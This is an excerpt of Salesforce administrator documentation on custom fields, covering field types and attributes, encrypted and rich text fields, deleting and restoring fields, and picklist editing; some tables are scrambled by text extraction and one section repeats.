Note:  If the decimal value is greater than 15, and
you add a percent sign to the number, a runtime error
occurs.

Values lose precision after 15 decimal places.

Allows users to enter any phone number.

Salesforce automatically formats it as a phone number.

Phone

If you are using Salesforce CRM Call Center, custom phone
fields are displayed with the  button, allowing click-to-dial
functionality. Consequently, salesforce.com recommends that
you do not use a custom phone field for fax numbers.

Allows users to select a value from a list you define.Picklist

Allows users to select more than one picklist value from a list
you define. These fields display each value separated by a
semicolon.

Picklist (Multi-select)

Automatically displays the record count of related records or
calculates the sum, minimum, or maximum value of related

Roll-Up Summary
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DescriptionType

records. The records must be directly related to the selected
record and on the detail side of a custom master-detail
relationship with the object that contains the roll-up summary
field. For example, a custom field called “Total Number of
Guests” displays the number of guest custom object records
in the Guests related list.

Allows users to enter any combination of letters, numbers, or
symbols. You can set a maximum length, up to 255 characters.

Text

Allows users to enter any combination of letters, numbers, or
symbols that are stored in encrypted form. You can set a

Text (Encrypted)

maximum length of up to 175 characters. Encrypted fields are
encrypted with 128-bit master keys and use the AES
(Advanced Encryption Standard) algorithm. You can archive,
delete, and import your master encryption key. To enable
master encryption key management, contact salesforce.com.

Allows users to enter up to 255 characters that display on
separate lines similar to a Description field.

Text Area

Allows users to enter up to 32,768 characters that display on
separate lines similar to a Description field. You can set

Text Area (Long)

the length of this field type to a lower limit, if desired. Any
length from 256 to 32,768 characters is allowed. Note that
every time you press Enter within a long text area field, a
linebreak and a return character are added to the text. These
two characters count toward the 32,768 character limit. This
data type is not available for activities or products on
opportunities. Only the first 254 characters in a rich text area
or a long text area are displayed in a report.

With the use of a toolbar, users can format the field content
and add images and hyperlinks. The toolbar allows the user

Text Area (Rich)

to undo, redo, bold, italicize, underline, strike-out, add a
hyperlink, upload or link to an image, modify alignment, add
a numbered or non-numbered list, indent, and outdent. The
maximum field size is 32,768 characters, inclusive of all the
formatting and HTML tags. Only the first 254 characters in
a rich text area or a long text area are displayed in a report.
The maximum size for uploaded images is 1MB. Only gif,
jpeg and png file types are supported.

Allows users to enter up to 255 characters of any valid website
address. When users click on the field, the URL will open in

URL

a separate browser window. Note that only the first 50
characters are displayed on the record detail pages.
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Custom Field Attributes
Here is a description of the attributes (in alphabetical order) that make up a custom field entry:

DescriptionField

For long text area fields, set the number of lines to be displayed on edit
pages. You can display between 2 and 50 lines (the default is 6 lines). If the

# Visible Lines

text does not fit in the specified number of visible lines, scroll bars will
appear. Long text area fields are displayed in their entirety on detail pages
and printable views.

Option that determines how a roll-up summary field is recalculated after
its properties change. Choose Automatic calculation to recalculate

Calculation Options

a field the next time it is displayed. Choose Force a mass
recalculation of this field as a safety net option to force
recalculation of the roll-up summary field values.

The name used in API SOQL relationship queries.Child Relationship Name

The data type of a field determines what type of information is in the field.
For example, an field with the Number data type contains a positive or

Data Type

negative integer. For more information on data types, see Custom Field
Types on page 2924.

For currency, geolocation, number, and percent fields, the number of digits
you can enter to the right of a decimal point, for example, 4.98 for an entry

Decimal Places

of 2. Note that the system rounds the decimal numbers you enter, if
necessary. For example, if you enter 4.986 in a field with Decimal Places
of 2, the number rounds to 4.99.

The value to apply when a user creates a new record. For checkbox custom
fields, choose Checked or Unchecked as the default value to indicate the

Default Value

default when creating new records. Default values should not be assigned
to fields that are both required and unique, as uniqueness errors may result.
See About Default Field Values on page 2962.

Text that describes the custom field. This description is for administration
purposes only and does not display to users on record detail and edit pages
that include the field.

Description

For auto-number fields, enter a Display Format to control such formatting
details as the minimum number of leading zeros as well as any prefix or
suffix for the number.

Begin by entering the required minimum: {0}. This is a placeholder for the
auto-number without any leading zeros. Add any prefix to your number

Display Format

before this placeholder and insert any suffix text after the placeholder. Insert
any date prefixes or suffixes in the form of {YY}, {YYYY}, {MM}, or {DD},
which always represent the create date of the record.
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DescriptionField

For information on using auto-number formats when entering your
Display Format, see Auto-Number Formatting Examples on page 2932.

For each object that can have custom fields, you can set up to three custom
text, number, or email fields as external IDs. An external ID field contains
record identifiers from a system outside of Salesforce.

You can use an external ID field to update or upsert records using the API.
When using the API or import wizards for custom objects and solutions,

External ID

you can use this field to prevent duplicates by also marking the field as
Unique.

Note:  Custom fields marked as Unique count against an object's
limit of three External ID fields. Custom indexing that occurs
automatically in the background by Salesforce does not count against
External ID limits.

The criteria used to select a group of records to calculate the value of a
roll-up summary field.

Filter Criteria

Enter the formula for the custom formula field or custom summary formula
for reports.

Formulas

The text that displays in the field-level help hover text for this field.Help Text

Name of the custom field as you want it to appear.Label

For geolocation fields, determines how the latitude and longitude notation
appears in the Salesforce interface.

Degrees, Minutes, Seconds

A notation for angular measurement that is based on the number 60:
there are 360 degrees to a circle, 60 minutes to a degree, and 60 seconds
to a minute.

Latitude and Longitude Display Notation

Decimal

Expresses the value as degrees, and converts the minutes and seconds
to a decimal fraction of the degree. Decimal notation does not use
cardinal points. North and East are positive values; South and West
are negative values.

For example, the coordinates for San Francisco can be expressed as follows:

LongitudeLatitude

122° 25' 5" W37° 46' 30" NDegrees,
Minutes,
Seconds

–122.395016°37.794016°Decimals
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DescriptionField

Regardless of the notation you choose to display in the interface, latitude
and longitude are stored in Salesforce as decimals.

For text fields, the maximum number of characters that a user can enter in
a field (up to 255 characters).

Length (for text fields)

For number, currency, and percent fields, the number of digits you can enter
to the left of the decimal point, for example, 123.98 for an entry of 3.

Length (for number, currency, percent fields)

For encrypted text fields, determines the character to use for hidden
characters. Available options are * and X.

Mask Character

For encrypted text fields, determines which characters are hidden and the
use of dashes in the field. Masked characters are hidden using the character
selected in Mask Character. Available options are:

Mask All Characters

All characters in the field are hidden.

Mask Type

Last Four Characters Clear

All characters are hidden but the last four display.

Credit Card Number

The first 12 characters are hidden and the last four display. Salesforce
automatically inserts a dash after every fourth character.

National Insurance Number

All characters are hidden. Salesforce automatically inserts spaces after
each pair of characters if the field contains nine characters. Use this
option for UK NINO fields.

Social Security Number

The first five characters are hidden and the last four display. Salesforce
automatically inserts a dash after the third and fifth characters.

Social Insurance Number

All characters are hidden but the last three display. Salesforce
automatically inserts a dash after the third and sixth characters.

The object on the master side of a master-detail relationship used to display
the value of a roll-up summary field.

Master Object

For relationship fields, the title for the related list that displays associated
records on the parent record.

Related List Label

For relationship fields, the name of the associated object.Related To

Makes the field required everywhere in Salesforce.

You must specify a default value for required campaign member custom
fields.

Required
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DescriptionField

Default values should not be assigned to fields that are both required and
unique, as uniqueness errors may result. See About Universally Required
Fields on page 3001.

For roll-up summary fields, choose the type of calculation to make:

DescriptionType

Roll-Up Type

Totals the number of related records.COUNT

Totals the values in the field you select in the Field to
Aggregate option. Only number, currency, and percent fields
are available.

SUM

Displays the lowest value of the field you select in the Field
to Aggregate option for all directly-related records. Only

MIN

number, currency, percent, date, and date/time fields are
available.

Displays the highest value of the field you select in the Field
to Aggregate option for all directly-related records. Only

MAX

number, currency, percent, date, and date/time fields are
available.

For auto-number fields, enter a Starting Number that is less than 1
billion. Check Generate Auto Number for existing records...

Starting Number

if you would like to automatically number all current records beginning with
the starting number you enter. If unchecked, the next record you enter will
be assigned the starting number and your existing records will be blank in
this field. For leads, only unconverted leads will be assigned a number.

An auto-number field can contain up to 10 digits and up to 20 additional
characters for your prefix or suffix.

For master-detail relationship fields, the Sharing Setting attribute
determines the sharing access that users must have to a master record in
order to create, edit, or delete its associated detail records.

Sharing Setting

The object on the detail side of a master-detail relationship used to provide
the values calculated in a roll-up summary field.

Summarized Object

If checked, prevents duplicate field values.

For text fields, you can control whether values that are identical except for
their case are considered unique. Select Treat "ABC" and "abc" as

Unique

duplicate values to enforce case-insensitive uniqueness, or select
Treat "ABC" and "abc" as different values to enforce
case-sensitive uniqueness.
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DescriptionField

Note:  Custom fields marked as Unique count against an object's
limit of three External ID fields. Custom indexing that occurs
automatically in the background by Salesforce does not count against
External ID limits.

For picklist fields, a list of available values (up to 255 characters for each
value). For picklists, select the appropriate checkbox to alphabetize the

Values

picklist entries. You can also set the first value as the default selection. If
you mark both boxes, Salesforce first alphabetizes the entries and then sets
the first alphabetized value as the default. For multi-select picklists, enter
a list of values, check the sorting options that apply, and enter how many
values you want displayed at a time on edit pages, which determines the
box height.

Auto-Number Formatting Examples

Use these examples when setting the display format for auto-number fields.

Displayed ValuesFormat

3 66 103{0}

003 066 103{000}

Sample- 00003 Sample- 00666 Sample- 10023Sample- {00000}

Value- 03 12 02 04 Value- 76 03 03 04 Value- 123 11 09 04Value- {00} {MM} {DD} {YY}

PO #12233 12-20-04 PO #25 06-07-04 PO #3 07-07-04PO #{0} {MM}-{DD}-{YY}

See Also:
Creating a Many-to-Many Relationship
Web Services API Developer's Guide

Geolocation Custom Field Overview—Beta
The geolocation custom field, which is available in a beta release, allows you to identify locations by their latitude and longitude
and calculate distances between locations.

Available in: All Editions

The geolocation custom field allows you to create a field that identifies a location by its latitude and longitude. You can then
use the geolocation field with the DISTANCE and GEOLOCATION formula functions to calculate distances between
locations. For example, you can calculate the distance between two geolocation fields (such as between the warehouse and the
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store), or between a geolocation field and any fixed latitude-longitude coordinates (such as between the warehouse and
37.794016°, –122.395016°, also known as San Francisco).

Note:  This is a beta release of geolocation and its functionality has known limitations, outlined here. To provide
feedback on geolocation, go to IdeaExchange.

Geolocation is a compound field that counts toward your organization’s limits as three custom fields: one for latitude, one for
longitude, and one for internal use. In this beta release, support for the compound field (geolocation) vs. the field’s components
(latitude and longitude) varies depending on the functionality you’re using in Salesforce. For example, you can create list views
that show the field and its components, but you can’t select the compound geolocation field in Apex; you can only run SOQL
queries on a geolocation field’s components.

Other limitations of this geolocation beta release include:

• Geolocation fields are not supported in custom settings.

• Geolocation fields are not available in dashboards, Visual Workflow, or workflow and approvals.

• Geolocation fields cannot be searched.

• Geolocation fields are not available in Schema Builder.

• DISTANCE and GEOLOCATION formula functions are available only when creating formula fields and in Visual
Workflow.

• Geolocation is supported in Apex only through SOQL queries, and only at the component level.

See Also:
Custom Field Types
Custom Field Attributes

Viewing Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Fields are not available in Database.com

1. Navigate to the fields page.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
• For custom settings, from Setup, click Develop > Custom Settings, and click the name of the custom setting.

2. Click the name of the field.
3. To modify a custom field or change the data type, click Edit.
4. To set users' access to the field, click Set Field-Level Security. Available in Enterprise, Unlimited, and Developer Edition

organizations only.
5. To view who can access the field based on permissions and record type, click View Field Accessibility. Available in

Enterprise, Unlimited, and Developer Edition organizations only.
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6. If the field is a dependent picklist, view a list of the controlling fields on which it depends. Click New to define a dependent
picklist. Click Edit to change the picklist dependency rules or Del to remove the picklist dependency.

7. If the custom field is a dependent picklist, click [Change] next to the controlling field to edit the picklist dependency rules.
8. To create a new validation rule for the field, click New in the Validation Rules related list. Click Edit to change a validation

rule or Del to remove it.
9. For picklist fields, you can add new values and edit, replace, or delete existing values.
10. To change External ID, Required, or other attributes under the General Options section, see Custom Field Attributes.

11. To restore the field and its data, click Undelete. This is available only if the field has been deleted but not permanently
erased. The field's behavior may be different after restoring it. To restore the field completely, see Managing Deleted
Custom Fields.

Note: If your organization uses person accounts, the Account Fields page lists both person account and business
account fields.

Person accounts use a combination of account and contact fields. The following contact fields are available for person
accounts, but not for business accounts.

• Fields in the Account Standard Fields list that display with a person account icon.

• Fields in the Contact Custom Fields & Relationships list.

To customize these fields, from Setup, click Customize > Contacts > Fields.

See Also:
Custom Settings Overview

Editing Fields
Available in: All Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To create or change fields:

1. For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
2. For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
3. Click Edit next to the field’s name.
4. Modify the field attributes. The attributes differ depending on the field type.

To change the type of your custom field, see Changing Custom Field Type on page 2958.

To make changes to picklists:

• Click Rename next to a value to change the name, make it the default picklist value, assign a color to use on charts, or
change additional information.
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• Click Del next to a value to remove it from the picklist.

Special picklists—such as opportunity Stage, Task Priority, Task Status, Lead Status, and Case
Status—may prompt you to map the deleted value to another existing value in all of your organization’s records. You
can map the values or leave your existing data unchanged.

• Click New to add values to the picklist. If you use record types, select any record types that you want to include the
new values.

• Click Reorder to change the sequence of picklist values.
• Click Replace to change the values of picklist fields in existing records.
• Click Printable View to open an easy-to-print list of your picklist values.
• Click Chart Colors and select an option to assign colors to picklist values for use in charts:

◊ Assign fixed colors to all values assigns a fixed color to each value from the standard set of chart colors. The Chart
Colors column shows the assigned colors. Manually change assigned colors by editing picklist values. For example,
if you want Closed Lost values to always show up as red in charts grouped by Opportunity Stage, assign red to that
picklist value.

◊ Assign colors to values dynamically assigns colors when a chart is generated. The Chart Colors column shows
“Assigned dynamically” for all colors. Assign fixed colors by editing picklist values. For example, if you only need
certain picklist values to show up as fixed colors in charts, manually assign colors to those values and leave the rest
as “Assigned dynamically”.

Manual assignments are overridden each time you click an option in Chart Colors.

Note:  Chart colors aren't available for multi-select picklists, currency picklists, or Task Subject, Event Subject,
Knowledge Validation Status, and Opportunity Competitor picklists.

5. Optionally, define custom help text for the field.
6. For lookup and master-detail relationship fields, optionally define a lookup filter.
7. For formula fields, click Next to modify the formula.
8. In Enterprise, Unlimited, and Developer Editions, click Next to set the field-level security for the field.
9. Click Save.

Note:

• Editing fields may require changing a large number of records at once. To process these changes efficiently, your
request may be queued and you may receive an email notification when the process has completed.

• To customize the way a custom object’s related list appears on a parent record’s detail page, edit the parent record’s
page layout. For example, if you want to edit which fields appear on a custom object’s related list on accounts, you
would edit the account page layout.

• You cannot change the Field Name if a custom field is referenced in Apex.

• When editing fields for accounts, opportunities, cases, contacts, or custom objects, check for any criteria-based
sharing rules that use the field in the rules. A field change may affect which records are shared.

See Also:
Defining Default Field Values
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Deleting Fields
Available in: All Editions

User Permissions Needed

“Customize Application”To delete custom fields:

To delete a custom field:

1. For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
2. For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
3. Click Del next to the name of the field.
4. When prompted, select the Yes, I want to delete the custom field checkbox to confirm, and click Delete.

Deleted custom fields and their data are stored until your organization permanently deletes them or 15 days has elapsed,
whichever happens first. Until that time, you can restore the field and its data. For information on restoring deleted custom
fields and relationships, see Managing Deleted Custom Fields on page 2936.

Note:

• Before deleting a custom field, consider where it is referenced. You can’t delete a custom field that is referenced
elsewhere. For example, you cannot delete a custom field that is referenced by a field update or Apex.

• When you delete a custom field, all of the field history data is deleted and changes are no longer tracked.

• A background process periodically runs that cleans up metadata associated with deleted custom fields. This process
will affect the Last Modified Date and Last Modified By fields on page layouts, record types, and custom
objects.

Managing Deleted Custom Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Page Layouts and Lead Fields are not available in Database.com

User Permissions Needed

“Customize Application”To restore deleted custom fields and relationships:

“Customize Application”To permanently delete custom fields or relationships:

Deleted custom fields and their data are stored until your organization permanently deletes them or 15 days has elapsed,
whichever happens first. Until that time, you can restore the field and its data. However, the field still counts against the
maximum number of custom fields allowed in your organization.
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To view a list of your deleted custom fields and relationships:

1. For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
2. For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
3. Click Deleted Fields at the bottom of the list of custom fields and relationships. The number in parentheses indicates the

total number of deleted custom fields for this object. This link only displays when you have a deleted custom field.
4. Use the list of deleted fields to perform the following actions:

• To view details about a field, click the field label.
• To permanently remove the custom field and its data, click Erase.
• To restore the field and its data, click Undelete. Some attributes of deleted fields are not restored automatically. To

restore these attributes manually:

a. Add the field to any page layouts that changed during the time the custom field was deleted. If reports and page
layouts were not edited, the restored field remains on them.

b. Make the field unique if necessary. Salesforce automatically removes the unique attribute from any deleted custom
field.

c. Make the field required if necessary. Salesforce automatically removes the required attribute for any deleted custom
field.

d. Add the custom field to any appropriate Force.com AppExchange packages. Salesforce automatically removes
deleted custom fields from packages that contain them.

e. Convert any lookup relationships to master-detail relationships if necessary. Salesforce converts all relationships to
lookup relationships when they are deleted. To convert a lookup relationship to a master-detail relationship, populate
all the applicable records with the appropriate data.

f. Redefine any field dependencies that Salesforce removed when the field was deleted.
g. Edit and save any formula fields, prompting a syntax check that you may have to resolve.
h. Set up field history tracking if necessary. If the list of fields enabled for history tracking has been modified during

the time the custom field was deleted, the restored field is no longer set up to track field history.

Notes on Restored Custom Fields

• The following characters are appended to the end of a custom field's developer name when it is deleted unless a deleted
field already has that developer name: “_del”. These characters remain when you restore the custom field.

• Formula fields are restored in a disabled state, which means they do not contain updated data until you edit and save them.
While a formula field is disabled, “#Error!” displays in place of the formula value.

• Restored fields do not display in search results immediately after you restore them. It may take a short time before the
restored custom field and its data are available in search results.

• Lead fields that are mapped to account, contact, or opportunity fields for lead conversion are still mapped accordingly
when restored.

• Auto number fields continue to increment after they are deleted and contain the correct values when restored.
• Field history data for the deleted custom field is restored.

Additional Custom Field Options
Changing Page Layouts

To change the location of a new custom field, edit the page layout for the appropriate tab.
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Using Record Types

If your organization uses record types, edit the record type to modify which picklist values are visible for the record type.

Tracking Custom Field History

You can select which custom fields to track on the History related list of custom objects and most standard objects.  All
entries include the date, time, nature of the change, and who made the change. History data does not count against your
organization’s storage limit.

Using the Translation Workbench

If your organization uses the Translation Workbench, notify your translators that new fields need translations.

Activity Custom Fields

Activity custom fields can apply only to tasks or only to events, or to both tasks and events. For example, you can create
one Time Spent field and then add it to both the event page layout and the task page layout.

Mapping Custom Lead Fields

For lead custom fields, you can click Map Lead Fields to specify which custom lead fields to map to custom account,
contact, and opportunity fields during a lead conversion.

Using Rich Text Area Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

"Customize Application"To create or change custom fields:

To improve the appearance of text, including adding images and hyperlinks, create rich text area custom fields. Rich text area
fields use the Salesforce HTML editor to format content.

Implementation Tips

Before creating rich text area custom fields, note the following:

• Salesforce supports up to 32,768 characters for each rich text area field, including the HTML tags. If desired, you can set
a lower limit.

• When you view or print content, Salesforce preserves the formatted version of the HTML in rich text area fields.
• Searches of content that contains rich text area fields ignore images and tags.
• Deleting a rich text area field moves it to the Deleted Fields section on the custom object or Salesforce Knowledge article

types.
• There are no limits to the number of rich text area and long text area fields that an object can contain, although your

Edition’s limit for the total number of custom fields allowed on an object, regardless of field type, applies. Each object can
contain a total of 1.6 million characters across long text area and rich text area fields. The default character limit for long
text area and rich text area fields is 32,768 characters. A long text area or rich text area field needs to contain at least 256
characters.

• The maximum size of an image that can be uploaded in a rich text area field is 1 MB. Only .gif, .jpg and .png file
types are supported.
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• You can only convert rich text area fields into long text area fields. Any images are deleted the next time the long text area
field is saved. After converting, markup is hidden in the long text area field but it is not removed from the record until you
save the record. That way, the markup can be restored if you change your mind.

• You can't add a hyperlink to an image.
• There is no support for disabling specific rich text area features. For example, you can't disable support for hyperlinks or

images on certain fields.
• HTML code is not supported in the Salesforce HTML editor. HTML code is treated as text.
• JavaScript or CSS is treated as text. For example, if you're creating an Idea through the API, any JavaScript or CSS code

is removed without warning.
• If you're creating an Idea through the API, some tags and attributes are filtered without warning. Salesforce supports a

limited number of approved HTML tags.
• Rich text area fields can be filtered and summarized in reports, but the HTML tags are included as text.
• Only the first 254 characters in a rich text area or a long text area are displayed in a report. If you download the report, the

entire field is available.
• When a rich text area field is used in a formula, the HTML tags are stripped out before the formula is run. For example,

when a rich text area field is used in a validation rule’s criteria, the HTML tags are removed before the evaluation.
• Rich text area fields aren't available in self service portals. They are available in partner portals and customer portals.
• Images uploaded within a rich text area field are extracted in the organization's weekly export and included in the exported

data.
• The mobile application treats rich text area fields like long-text area fields, which don’t support formatted HTML content

or images. The mobile application truncates rich text area fields at 1,000 characters, which includes HTML markup.
Administrators should consider removing rich text area fields from mobile page layouts. If a mobile user edits a rich text
area field that contains an existing text entry longer than 1,000 characters, the mobile application truncates the text in the
field.

• The text part of rich text area fields counts towards data storage for the entity that contains the field. The uploaded images
within the rich text area fields are counted towards file storage for the entity that contains the field.

• The rich text area field is available in the API.
• You can copy and paste text from external sources such as Microsoft® Word, but you may have to reapply formatting.

Best Practices

• You can specify how big the editor box should be for this field by configuring the “Number of lines displayed” property in
the field’s setup.

• We recommend using the rich text area field in a one column page layout; the field's formatting toolbar is ideal for a single
column.

• To upload many images, use the API version 20 or later. For more information, see the Force.com SOAP API Developer's
Guide.

Note:  When uploading images with the API, the alt attribute is not populated unless specified separately.

See Also:
Creating Custom Fields
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About Encrypted Custom Fields
Available in: Developer, Enterprise, Unlimited, and Database.com Editions

Encrypted custom fields are text fields that can contain letters, numbers, or symbols but are encrypted. The value of an encrypted
field is only visible to users that have the “View Encrypted Data” permission.

Before you begin working with encrypted custom fields, review the following implementation notes and best practices:

Implementation Notes

• Encrypted fields are encrypted with 128-bit master keys and use the AES (Advanced Encryption Standard) algorithm.
You can archive, delete, and import your master encryption key. To enable master encryption key management, contact
salesforce.com.

• Encrypted custom fields cannot be unique, an external ID, or have default values.
• While other text fields can contain up to 255 characters, encrypted text fields are limited to 175 characters due to the

encryption algorithm.
• Encrypted fields are not available for use in filters such as list views, reports, roll-up summary fields, and rule filters.
• Encrypted fields cannot be used to define report criteria but they can be included in report results.
• Encrypted fields are not searchable but they can be included in search results.
• Encrypted fields are not available in the following: Salesforce Classic, Connect Offline, Connect for Lotus Notes, Connect

for Outlook, Salesforce for Outlook, lead conversion, workflow rule criteria or formulas, formula fields, outbound messages,
default values, and Web-to-Lead and Web-to-Case forms.

• You can use encrypted fields in email templates but the value is always masked regardless of whether you have the “View
Encrypted Data” permission.

• If you have created encrypted custom fields, make sure your organization has secure connections using SSL (Secure Sockets
Layer) enabled.

• If you have the “View Encrypted Data” permission and you grant login access to another user, be aware that the other user
will be able to see encrypted fields unmasked (in plain text).

• Only users with the “View Encrypted Data” permission can clone the value of an encrypted field when cloning that record.
• Only the <apex:outputField> component supports presenting encrypted fields in Visualforce pages.

Best Practices

• Encrypted fields are editable regardless of whether the user has the “View Encrypted Data” permission. Use validation
rules, field-level security settings, or page layout settings to prevent users from editing encrypted fields.

• You can still validate the values of encrypted fields using validation rules or Apex. Both work regardless of whether the
user has the “View Encrypted Data” permission. Data for encrypted fields in the debug log is masked.

• Existing custom fields cannot be converted into encrypted fields nor can encrypted fields be converted into another data
type. To encrypt the values of an existing (unencrypted) field, export the data, create an encrypted custom field to store
that data, and import that data into the new encrypted field.

• Mask Type is not an input mask that ensures the data matches the Mask Type. Use validation rules to ensure that the
data entered matches the mask type selected.
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• Use encrypted custom fields only when government regulations require it because they involve additional processing and
have search-related limitations.

See Also:
Creating Custom Fields

About Encrypted Custom Fields
Available in: Developer, Enterprise, Unlimited, and Database.com Editions

Encrypted custom fields are text fields that can contain letters, numbers, or symbols but are encrypted. The value of an encrypted
field is only visible to users that have the “View Encrypted Data” permission.

Before you begin working with encrypted custom fields, review the following implementation notes and best practices:

Implementation Notes

• Encrypted fields are encrypted with 128-bit master keys and use the AES (Advanced Encryption Standard) algorithm.
You can archive, delete, and import your master encryption key. To enable master encryption key management, contact
salesforce.com.

• Encrypted custom fields cannot be unique, an external ID, or have default values.
• While other text fields can contain up to 255 characters, encrypted text fields are limited to 175 characters due to the

encryption algorithm.
• Encrypted fields are not available for use in filters such as list views, reports, roll-up summary fields, and rule filters.
• Encrypted fields cannot be used to define report criteria but they can be included in report results.
• Encrypted fields are not searchable but they can be included in search results.
• Encrypted fields are not available in the following: Salesforce Classic, Connect Offline, Connect for Lotus Notes, Connect

for Outlook, Salesforce for Outlook, lead conversion, workflow rule criteria or formulas, formula fields, outbound messages,
default values, and Web-to-Lead and Web-to-Case forms.

• You can use encrypted fields in email templates but the value is always masked regardless of whether you have the “View
Encrypted Data” permission.

• If you have created encrypted custom fields, make sure your organization has secure connections using SSL (Secure Sockets
Layer) enabled.

• If you have the “View Encrypted Data” permission and you grant login access to another user, be aware that the other user
will be able to see encrypted fields unmasked (in plain text).

• Only users with the “View Encrypted Data” permission can clone the value of an encrypted field when cloning that record.
• Only the <apex:outputField> component supports presenting encrypted fields in Visualforce pages.

Best Practices

• Encrypted fields are editable regardless of whether the user has the “View Encrypted Data” permission. Use validation
rules, field-level security settings, or page layout settings to prevent users from editing encrypted fields.

• You can still validate the values of encrypted fields using validation rules or Apex. Both work regardless of whether the
user has the “View Encrypted Data” permission. Data for encrypted fields in the debug log is masked.

• Existing custom fields cannot be converted into encrypted fields nor can encrypted fields be converted into another data
type. To encrypt the values of an existing (unencrypted) field, export the data, create an encrypted custom field to store
that data, and import that data into the new encrypted field.
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• Mask Type is not an input mask that ensures the data matches the Mask Type. Use validation rules to ensure that the
data entered matches the mask type selected.

• Use encrypted custom fields only when government regulations require it because they involve additional processing and
have search-related limitations.

See Also:
Creating Custom Fields

Updating Picklists
Available in: All Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To change picklists:

To update any picklist field:

1. Navigate to the fields page for your object. For example, for account fields, from Setup, click Customize > Accounts >
Fields.

For custom objects, from Setup, click Create > Objects, then click the name of an object.

For Knowledge validation status picklists, from Setup, click Customize > Knowledge > Validation Statuses.

2. In the Custom Fields & Relationships related list, click the name of the picklist field you want to update.
3. In the Picklist Values section, click Edit next to a value.
4. In the Picklist Edit page, you can change the name of the value and make the value the default for the master picklist. You

can also assign a color for use in charts by clicking the  button. To assign a color dynamically when a chart is generated,
click Assign color dynamically.

Note:  Chart colors aren't available for multi-select picklists, currency picklists, or Task Subject, Event Subject,
Knowledge Validation Status, and Opportunity Competitor picklists.

Tip:

• Some special picklists, such as Task Priority, Stage, or Partner Role, have additional information
that you can edit.

• If you use record types, changing the default value of the master picklist does not affect the default value of
the picklist for a record type.

• For Ideas, setting the default value of the Categories or Status picklists does not affect the default value on
the Ideas pages.

• If you change the label for a picklist value that is used as a filter criteria, the picklist value is automatically
removed from the filter criteria. For example, if your report contains a filter where Lead Source equals
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Email or Web and you change the picklist value Web to Referral, your report filter will change to Lead
Source equals Email. If the changed picklist value was the only value specified for a particular filter, it
will continue to show up in your filters, but an error will display.

5. Click Save.

Note:  If your organization uses the Translation Workbench, notify your translators that the translations may be out
of date whenever you change picklist values.

See Also:
Additional Options for Updating Picklists
Picklist Limitations

Additional Options for Updating Picklists
Use the following options to edit picklist values.

• Click Rename next to a value to change the name, make it the default picklist value, assign a color to use on charts, or
change additional information.

• Click Del next to a value to remove it from the picklist.

Special picklists—such as opportunity Stage, Task Priority, Task Status, Lead Status, and Case Status—may
prompt you to map the deleted value to another existing value in all of your organization’s records. You can map the values
or leave your existing data unchanged.

• Click New to add values to the picklist. If you use record types, select any record types that you want to include the new
values.

• Click Reorder to change the sequence of picklist values.

• Click Replace to change the values of picklist fields in existing records.

• Click Printable View to open an easy-to-print list of your picklist values.

• Click Chart Colors and select an option to assign colors to picklist values for use in charts:

◊ Assign fixed colors to all values assigns a fixed color to each value from the standard set of chart colors. The Chart
Colors column shows the assigned colors. Manually change assigned colors by editing picklist values. For example,
if you want Closed Lost values to always show up as red in charts grouped by Opportunity Stage, assign red to that
picklist value.

◊ Assign colors to values dynamically assigns colors when a chart is generated. The Chart Colors column shows
“Assigned dynamically” for all colors. Assign fixed colors by editing picklist values. For example, if you only need certain
picklist values to show up as fixed colors in charts, manually assign colors to those values and leave the rest as “Assigned
dynamically”.

Manual assignments are overridden each time you click an option in Chart Colors.

Note:  Chart colors aren't available for multi-select picklists, currency picklists, or Task Subject, Event Subject,
Knowledge Validation Status, and Opportunity Competitor picklists.
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For organizations using record types, this picklist is a master picklist. You can include some or all of the values from the master
picklist in different record types to offer a subset of values to users based on their profile.

See Also:
Updating Picklists

Picklists with Additional Information
These standard picklist fields have additional information that you can edit.

DescriptionPicklist

Roles of account partners, for example, Consultant, Supplier.
These options are available when you add an account to the
Partners related list of an account or opportunity.

To edit, from Setup, click Customize > Accounts > Partner
Roles.

Partner Role (for accounts)

Enter the name of the partner role in the “Role” column. In
the “Reverse Role” column, enter the corresponding reverse
partner role. Assigning a partner role to an account creates a
reverse partner relationship so that both accounts list the other
as a partner.

Each role and reverse role value can have up to 40 characters.

Urgency of case, for example, Low, High.

If you delete a value, you have the option to map the deleted
value to another existing value in all of your organization’s
cases.

Priority (for cases)

Each picklist value can have up to 40 characters.

State of a campaign member, for example, Sent or Responded.

If you delete a Status value, you have the option to map the
deleted value to another existing value. The new replacement

Status (for campaign members)

value is automatically added to the member status for
campaigns that contained the deleted value.

If the deleted value is the default member status for a
campaign, the new replacement value becomes the default
status for that campaign.

State of case, for example, New, On Hold.

If you delete a value, you have the option to map the deleted
value to another existing value in all of your organization’s
cases.

Status (for cases)
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DescriptionPicklist

Each picklist value can have up to 40 characters.

State of the contract in the contract business process. You can
add values to this picklist and organize each value into one of

Status (for contracts)

several categories, for example, “Draft”, “In Approval Process”,
or “Activated”. Then sort your contracts using these categories
in reports and views.

Role of a contact on a contract, for example, Business User,
Decision Maker. These options are available when you add a
contact to the Contact Roles related list of a contract.

To edit, from Setup, click Customize > Contracts > Contact
Roles.

Contact Role (for contracts)

Each picklist value can have up to 40 characters.

State of the lead, for example, Open, Qualified.

Select one value as the “Default Status” assigned to all new
leads created manually, via the import wizard, or via your

Lead Status (for leads)

website. Select one or more values as the “Converted Status”
assigned to converted leads. When you convert qualified leads
into an account, contact, and opportunity, you can select one
of the “Converted” statuses to assign to the lead. Leads with
a “Converted” status type are no longer available in the Leads
tab, although you can include them in reports.

If you delete a value, you have the option to map the deleted
value to another existing value in all of your organization’s
leads.

Each value can have up to 20 characters.

Role of a contact for an opportunity, for example, Business
User, Decision Maker. These options are available when you

Contact Role (for opportunities)

add a contact to the Contact Roles related list of an
opportunity.

